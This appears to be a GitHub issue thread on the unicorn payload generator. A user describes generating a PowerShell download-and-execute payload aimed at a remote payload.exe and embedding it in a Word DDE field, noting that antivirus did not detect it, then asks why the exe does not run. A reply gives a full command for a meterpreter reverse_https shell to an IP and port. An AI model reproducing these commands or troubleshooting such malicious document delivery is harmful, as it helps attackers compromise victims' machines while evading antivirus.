### ISSUE TITLE
Windows/download_exec

### ISSUE THREAD

**Issue by mamria33** [trustedsec/unicorn#148]
I am trying to use unicorn to embed shell command in DDE or Micro in Word file. Using Windows/download_exec payload.
I have MSF installed and python 3.7. I run: python unicorn.py windows/download_exec url=https://myserver/payload.exe

it completed fine and generate powershell_attack.txt. I have copied this file contents in DDE field in word file. The good news, not detected by AV. the bad one, it does not execute the exe file!

what do u think?

**Comment by aalexandrre** [comment]
did you tried  reverse_https "PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443" to see if it`s works?
